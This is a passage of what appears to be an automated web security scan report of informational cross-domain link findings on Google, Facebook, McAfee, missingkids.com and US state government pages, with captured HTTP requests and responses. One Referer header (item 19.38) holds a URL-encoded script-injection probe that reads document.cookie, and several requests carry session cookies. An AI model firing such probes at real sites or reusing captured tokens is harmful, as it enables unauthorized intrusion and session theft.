</FONT><A href="https://www.enetwizard.com/antares/view_order_status.asp" target=_blank><FONT size=2>
...[SNIP]...
<br><a href="http://www.virtualforum.com" target="_blank" class="FooterSm">Developed by<br>
...[SNIP]...

19.34. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/like.php?href=http://www.utah.gov/pmn/sitemap/notice/67945.html&amp;layout=standard&amp;show_faces=false&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.utah.gov/pmn/sitemap/notice/67945.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.152.54
X-Cnection: close
Date: Sat, 30 Apr 2011 11:24:16 GMT
Content-Length: 8176

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yM/r/FGFAI5AC1WM.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yg/r/vnWtCAcBiXn.js"></script>
...[SNIP]...

19.35. http://www.georgia.gov/external/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.georgia.gov
Path:   /external/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /external/?url=http://georgiawildlife.dnr.state.ga.us/content/displaynavigation.asp?TopCategory=12 HTTP/1.1
Host: www.georgia.gov
Proxy-Connection: keep-alive
Referer: http://ga.gov/00/channel_title/0,2094,4802_4969,00.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:46:11 GMT
Server: Apache/1.3.29 (Unix)
Expires: Tue, 20 Jun 1995 04:13:09 GMT
Set-cookie: JSESSIONID=AAF887C5B6B8BA6CE6E71C89D0C3E7B2;Path=/
Set-Cookie: vgnvisitor=2w45tw00bd800001jrJrQQ509e; path=/; expires=Saturday, 06-Sep-2014 23:50:08 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 1063


<html>
<head>
<title>Redirecting...</title>
<link rel="stylesheet" type="text/css" href="/gta/mcm/files/cda.css">


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
<p><a href="http://georgiawildlife.dnr.state.ga.us/content/displaynavigation.asp?TopCategory=12">http://georgiawildlife.dnr.state.ga.us/content/displaynavigation.asp?TopCategory=12</a>
...[SNIP]...

19.36. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=kansas+gov HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=cMOTWQGkXQrk7nh54pMJ1zQ_ycsNxj0VXcwHDPJp-lB7ImooFb9JoLuGI39McEZosntJPHUik-1OWZ3xy9chGAc15L9QJMcDt-OTMQ2hNhjOnw17Fu6WntRqrZ3m-gf4

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:12:46 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/rU20-FBA.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 84330

<!doctype html> <head> <title>kansas gov - Google Search</title> <script>window.google={kEI:"ru67TcbqO5LAtge2rcDDBQ",kEXPI:"17259,24472,25907,27147,28514,28766,28887,29481,29509,29681,29685,29784
...[SNIP]...
<li class=gbmtc><a class=gbmt id=gb_36 onclick="gbar.qsj(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?q=kansas+gov&um=1&ie=UTF-8&sa=N&hl=en&tab=w1">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.kansas.gov/" class=l onmousedown="return clk(this.href,'','','','1','','0CB4QFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:GY6dFylwMM0J:www.kansas.gov/+kansas+gov&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CCMQIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.kansas.gov/government/" onmousedown="return clk(this.href,'','','','1','','0CCUQqwMoADAA')">Government</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.kansas.gov/business/" onmousedown="return clk(this.href,'','','','1','','0CCYQqwMoATAA')">Business</a></div><div class=sld><a class=sla href="http://www.kansas.gov/services/" onmousedown="return clk(this.href,'','','','1','','0CCcQqwMoAjAA')">Services</a></div><div class=sld><a class=sla href="http://www.kansas.gov/government/agency_association_listing.html" onmousedown="return clk(this.href,'','','','1','','0CCgQqwMoAzAA')">Kansas Agency Listing</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.kansas.gov/help_center/contact.html" onmousedown="return clk(this.href,'','','','1','','0CCkQqwMoBDAA')">Contact us</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.kansas.gov/help_center/" onmousedown="return clk(this.href,'','','','1','','0CCoQqwMoBTAA')">Help Center</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.kansas.gov/tourism/" onmousedown="return clk(this.href,'','','','1','','0CCsQqwMoBjAA')">Tourism</a></div><div class=sld><a class=sla href="http://www.kansas.gov/education/" onmousedown="return clk(this.href,'','','','1','','0CCwQqwMoBzAA')">Education</a>
...[SNIP]...
<h3 class="r"><a href="http://www.kansas.gov/government/" class=l onmousedown="return clk(this.href,'','','','2','','0CC8QFjAB')">Government - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:bwcF-X2oS2MJ:www.kansas.gov/government/+kansas+gov&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CDQQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.kansas.gov/business/" class=l onmousedown="return clk(this.href,'','','','3','','0CDYQFjAC')">Business - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:TjiSBPZSJIYJ:www.kansas.gov/business/+kansas+gov&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CDsQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.kansas.gov/services/" class=l onmousedown="return clk(this.href,'','','','4','','0CD0QFjAD')">Services - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:EmbMWQNZAbgJ:www.kansas.gov/services/+kansas+gov&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','4','','0CEIQIDAD')">Cached</a>
...[SNIP]...
<span class=tl><a href="http://www.forbes.com/feeds/ap/2011/04/29/business-ks-brownback-legislature_8442310.html" class=l onmousedown="return clk(this.href,'','','','5','','0CEUQqQIwBA')">GOP <em>
...[SNIP]...
<span class=tl><a href="http://www.kansascity.com/2011/04/29/2837043/first-building-opens-on-kansas.html" class=l onmousedown="return clk(this.href,'','','','6','','0CEsQqQIwBQ')">First building opens on <em>
...[SNIP]...
<span class=tl><a href="http://www.kansascity.com/2011/04/29/2837127/kansas-officials-will-study-k.html" class=l onmousedown="return clk(this.href,'','','','7','','0CFEQqQIwBg')"><em>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Kathleen_Sebelius" class=l onmousedown="return clk(this.href,'','','','8','','0CFoQFjAH')">Kathleen Sebelius - Wikipedia, the free encyclopedia</a>
...[SNIP]...
<div class=osl><a href="http://en.wikipedia.org/wiki/Kathleen_Sebelius#Early_life_and_family" onmousedown="return clk(this.href,'','','','8','','0CGEQ0gIoADAH')">Early life and family</a> - <a href="http://en.wikipedia.org/wiki/Kathleen_Sebelius#Early_political_career" onmousedown="return clk(this.href,'','','','8','','0CGIQ0gIoATAH')">Early political career</a> - <a href="http://en.wikipedia.org/wiki/Kathleen_Sebelius#Governorship" onmousedown="return clk(this.href,'','','','8','','0CGMQ0gIoAjAH')">Governorship</a> - <a href="http://en.wikipedia.org/wiki/Kathleen_Sebelius#Recognition" onmousedown="return clk(this.href,'','','','8','','0CGQQ0gIoAzAH')">Recognition</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Q0oHLHEEO98J:en.wikipedia.org/wiki/Kathleen_Sebelius+kansas+gov&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CF8QIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://emporia-kansas.gov/" class=l onmousedown="return clk(this.href,'','','','9','','0CGYQFjAI')">City of Emporia, <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:H_3wP2urVXkJ:emporia-kansas.gov/+kansas+gov&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CGsQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://budget.ks.gov/" class=l onmousedown="return clk(this.href,'','','','10','','0CGwQFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:MIMGP6N7WwkJ:budget.ks.gov/+kansas+gov&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CHEQIDAJ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.accesskansas.org/kbi/ro.shtml" class=l onmousedown="return clk(this.href,'','','','11','','0CHMQFjAK')">KBI - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:WvKTduTJBu4J:www.accesskansas.org/kbi/ro.shtml+kansas+gov&amp;cd=11&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','11','','0CHgQIDAK')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.facebook.com/pages/Kansasgov-Kansas-Government-Online/52068474220" class=l onmousedown="return clk(this.href,'','','','12','','0CHoQFjAL')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:ad3ioN_p2RIJ:www.facebook.com/pages/Kansasgov-Kansas-Government-Online/52068474220+kansas+gov&amp;cd=12&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','12','','0CH8QIDAL')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.kansascity.com/2011/04/23/2821219/gov-brownback-proposes-eliminating.html" class=l onmousedown="return clk(this.href,'','','','13','','0CIABEBYwDA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:q_-QI2kETfgJ:www.kansascity.com/2011/04/23/2821219/gov-brownback-proposes-eliminating.html+kansas+gov&amp;cd=13&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','13','','0CIUBECAwDA')">Cached</a>
...[SNIP]...
<div><a href="http://www.ksrevenue.org/" class=l onmousedown="return clk(this.href,'','','','14','','0CIcBEKIIMA0')">Kansas Department of Revenue</a>
...[SNIP]...
<div><a href="http://www.jocogov.org/" class=l onmousedown="return clk(this.href,'','','','15','','0CIkBEKIIMA4')">jocogov</a>
...[SNIP]...
<div><a href="http://www.kslegislature.org/" class=l onmousedown="return clk(this.href,'','','','16','','0CIsBEKIIMA8')">Kansas State Legislature</a>
...[SNIP]...
<div><a href="http://www.kssos.org/" class=l onmousedown="return clk(this.href,'','','','17','','0CI0BEKIIMBA')">Kansas Secretary of State</a>
...[SNIP]...

19.37. http://www.google.com/url  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=1&ved=0CCoQFjAA&url=http%3A%2F%2Fwww.nh.gov%2F&ei=Zj27TYvaIYaTtwf8zMDcBQ&usg=AFQjCNG-Vm1y7Eu2j5Gy4SayNPpM6IA2tg HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=DEntMOM-vLiKsZ_1SG3HUd0B0oGbRKXtRpi1pq3lEVMkOSBMrvdVv72rCBr0341W89kHA-PBZDI3vmV4fFluvryIdICZc8i1bWqGwoBC29F_oZvehlhP4A1MlN_8jpYE

Response

HTTP/1.1 302 Found
Location: http://www.nh.gov/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Fri, 29 Apr 2011 22:36:25 GMT
Server: gws
Content-Length: 215
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.nh.gov/">here</A>.
<
...[SNIP]...

19.38. http://www.in.gov/dwd/WorkOne//  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /dwd/WorkOne//

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /dwd/WorkOne//?513f2 HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.workoneworks.com/?513f2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6c36e2d12eb=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:03:25 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 4703
Content-Type: text/html
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 15:04:25 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</title>

<script type="text/javascript" src="http://www.google.com/jsapi?key=ABQIAAAA2pimxBn09po4fG4ZmqpduxQDAerG9pY5tHuRFOlc0CCbJ6JHjhSK6APljZFzILdvuOItzAb-3jSZww"></script>
...[SNIP]...
</a> &nbsp;|&nbsp; <a href="http://www.indianacareerconnect.com/">Search Job Openings</a>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
...[SNIP]...
<noscript>
   <a href="http://www.quantcast.com/p-773__jh9iaI2Y" target="_blank"><img src="//secure.quantserve.com/pixel/p-773__jh9iaI2Y.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

19.39. http://www.leg.state.co.us/clics/clics2011a/cslFrontPages.nsf/Audio  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.leg.state.co.us
Path:   /clics/clics2011a/cslFrontPages.nsf/Audio

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /clics/clics2011a/cslFrontPages.nsf/Audio?OpenForm HTTP/1.1
Host: www.leg.state.co.us
Proxy-Connection: keep-alive
Referer: http://www.colorado.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Sat, 30 Apr 2011 11:23:00 GMT
Last-Modified: Sat, 30 Apr 2011 11:22:58 GMT
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 8323
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Colorado General Assembly: Audio</title>
<script language="JavaScript" type="text/javascript">
<!--
document._domi
...[SNIP]...
<td width="24%"><a href="http://www.coloradochannel.net/"><b>
...[SNIP]...
<td width="72%" colspan="2"><a href="http://coloradochannel.net/node/1620"><b>
...[SNIP]...

19.40. https://www.mcafeesecure.com/RatingVerify  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.mcafeesecure.com
Path:   /RatingVerify

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /RatingVerify?ref=home.mcafee.com&lang=EN HTTP/1.1
Host: www.mcafeesecure.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: McAfeeSecure
Vary: Accept-Encoding
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: LANG=EN; path=/; expires=Mon, 05-Jan-2043 23:05:25 GMT
Set-Cookie: CAMEFROM=home.mcafee.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Fri, 29 Apr 2011 21:18:46 GMT
Set-Cookie: resin=1758093834.20480.0000; path=/
Content-Length: 10349


<html>
<head>

<!-- Google Website Optimizer Control Script -->
<script>
function utmx_section(){}function utmx(){}
(function(){var k='1568676568',d=document,l=d.location,c=d.cookie;fun
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link rel="stylesheet" type="text/css" href="https://images.scanalert.com/css/rating-verify.css">
</head>
...[SNIP]...
</script>
<script language='javascript' src='https://server.iad.liveperson.net/hc/10599399/x.js?cmd=file&file=chatScript3&site=10599399&imageUrl=https://images.scanalert.com/images/liveperson/set03'> </script>
...[SNIP]...

19.41. http://www.missingkids.com/missingkids/servlet/PageServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.missingkids.com
Path:   /missingkids/servlet/PageServlet

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /missingkids/servlet/PageServlet?LanguageCountry=en_US&PageId=2936 HTTP/1.1
Host: www.missingkids.com
Proxy-Connection: keep-alive
Referer: http://www.missingkids.com/cybertip/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Content-Length: 12768
Date: Sat, 30 Apr 2011 00:40:54 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- MKPAGE=ContentMain.jsp -->
<html>
<head>

<title>CyberTipline - Report Child Pornography</title>


<!-- MKPAGE=Miss
...[SNIP]...
<area shape="rect" coords="338,121,600,166" href="https://secure.missingkids.com/missingkids/servlet/CybertipServlet?LanguageCountry=en_US" alt="Report Child Pornography" />
<area shape="rect" coords="2,134,216,166" href="http://mfile.akamai.com/11327/wmv/ncmec.download.akamai.com/11327/media/cybertipline.asx" alt="CyberTipline Video" />
</map>
...[SNIP]...
<td height="57" valign="top"><a href="http://www.fbi.gov/wanted/seekinfo/seekcac.htm" target="_blank"><img src="http://www.missingkids.com/en_US/images/ECAP.gif" alt="Help the FBI find an offender" width="289" height="44" border="0" />
...[SNIP]...
<td colspan="2"><a href="http://www.virtualglobaltaskforce.com/country_identification.html"><img src="http://www.missingkids.com/en_US/images/VGT_Bar.gif" alt="Virtual Global Taskforce" width="598" height="35" border="0" />
...[SNIP]...
<br />
<a href="http://www.netsmartz.org" target="_blank">NetSmartz</a>
...[SNIP]...
<br />
<a href="http://www.netsmartz411.org" target="_blank">NetSmartz411</a>
...[SNIP]...
<br />
<a href="http://www.inhope.org/en/index.html" target="_blank">Inhope</a>
...[SNIP]...
<!-- Google Analytics -->

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

19.42. http://www.missingkids.com/missingkids/servlet/PageServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.missingkids.com
Path:   /missingkids/servlet/PageServlet

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /missingkids/servlet/PageServlet?LanguageCountry=en_US&PageId=2447 HTTP/1.1
Host: www.missingkids.com
Proxy-Connection: keep-alive
Referer: http://www.missingkids.com/missingkids/servlet/PageServlet?LanguageCountry=en_US&PageId=2936
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=158082086.1304124080.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=158082086.941977473.1304124080.1304124080.1304124080.1; __utmc=158082086; __utmb=158082086.1.10.1304124080

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Content-Length: 22258
Date: Sat, 30 Apr 2011 00:41:05 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- MKPAGE=ContentMain.jsp -->
<html>
<head>

<title>CyberTipline Reporting Categories</title>


<!-- MKPAGE=Missingkid
...[SNIP]...
<area shape="rect" coords="550,120,596,162" href="https://secure.missingkids.com/missingkids/servlet/CybertipServlet?LanguageCountry=en_US" alt="Click to make a report to the CyberTipline" />
<area shape="rect" coords="1,143,157,169" href="http://mfile.akamai.com/11327/wmv/ncmec.download.akamai.com/11327/media/cybertipline.asx" alt="Watch Our Video" />
</map>
...[SNIP]...
<p>Adults concerned about adult obscenity not involving children on the
Internet should make a report to <a title="http://www.obscenitycrimes.org/" href="http://www.obscenitycrimes.org">www.obscenitycrimes.org</a>
...[SNIP]...
<!-- Google Analytics -->

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

19.43. http://www.ms.gov/ms_sub_template.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ms.gov
Path:   /ms_sub_template.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ms_sub_template.jsp?Category_ID=4 HTTP/1.1
Host: www.ms.gov
Proxy-Connection: keep-alive
Referer: http://www.ms.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000IR5EHNxWBpUhViAYMe_JD1G:-1; __utmz=63443123.1304126862.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=63443123.1656772245.1304126862.1304126862.1304126862.1; __utmc=63443123; __utmb=63443123.1.10.1304126862

Response

HTTP/1.1 200 OK
content-language: en-US
content-type: text/html;charset=ISO-8859-1
date: Sat, 30 Apr 2011 01:34:29 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-wily-info: Clear guid=A40AEA260A0C1A16441A441A3EB9CF36
x-wily-servlet: Encrypt1 eKjr2dtguqhf01QzjJGZfnkVxccL1ZGHaBHZyFn/EHcuLTm8hVb5g9io4wdLOGTuihBqOw4kf1Qclg0j4FilHUG1V9zgQBAvmGanPPuAtYZWQHtAYSklg01qYE0ZX2Lg7mlNPl70nzYjDbgcmgGlwN5cwgPMSSUR4pTaqrepuY13rHldvZD7gDNVAx04SG1D
Content-Length: 28998

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


   <html>
<head>
   <title>Learning in Mississippi | The Official State Web Site of Mississippi</title>
   <link href="ms
...[SNIP]...
<td valign="top">

<a href="http://www.mde.k12.ms.us/ms.htm" class="fastfactslink">Get help with your school project about Mississippi</a>
...[SNIP]...
<td valign="top">

<a href="http://www.mpbonline.org/educators/mpb-express/" class="fastfactslink">Quality Digital Video to Teacher's Desktops</a>
...[SNIP]...
<td valign="top">
<a href="https://www.prepaidtuition.com/solutionsapp/ms/instructions.asp" class="quicklinks">Prepaid College Tuition Application</a>
...[SNIP]...
<td valign="top">
<a href="https://www.prepaidtuition.com/solutionsapp/ms/instructions.asp" class="quicklinks">College Savings Application</a>
...[SNIP]...
<td valign="top">
<a href="http://dbease.clarionledger.com/dbEase/cgi-bin/search.pl?tableName=IHL2002a" class="quicklinks">Scholarship Database at Mississippi Universities</a>
...[SNIP]...
<td valign="top">
<a href="http://www.mde.k12.ms.us/resources.htm" class="quicklinks">Educational Resources for Teachers</a>
...[SNIP]...
<td valign="top">
<a href="http://home.msais.org/index2.php" class="quicklinks">Mississippi Association of Independent Schools</a>
...[SNIP]...
<td valign="top">
<a href="http://www.mde.k12.ms.us/" class="quicklinks">Mississippi Department of Education</a>
...[SNIP]...
<td valign="top">
<a href="http://www.msecampus.org/" class="quicklinks">Mississippi e-Campus</a>
...[SNIP]...
<td valign="top">
<a href="http://www.msvcc.org/" class="quicklinks">Mississippi's Virtual Community College</a>
...[SNIP]...

19.44. http://www.nccourts.org/Citizens/GoToCourt/Default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nccourts.org
Path:   /Citizens/GoToCourt/Default.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Citizens/GoToCourt/Default.asp?topic=1 HTTP/1.1
Host: www.nccourts.org
Proxy-Connection: keep-alive
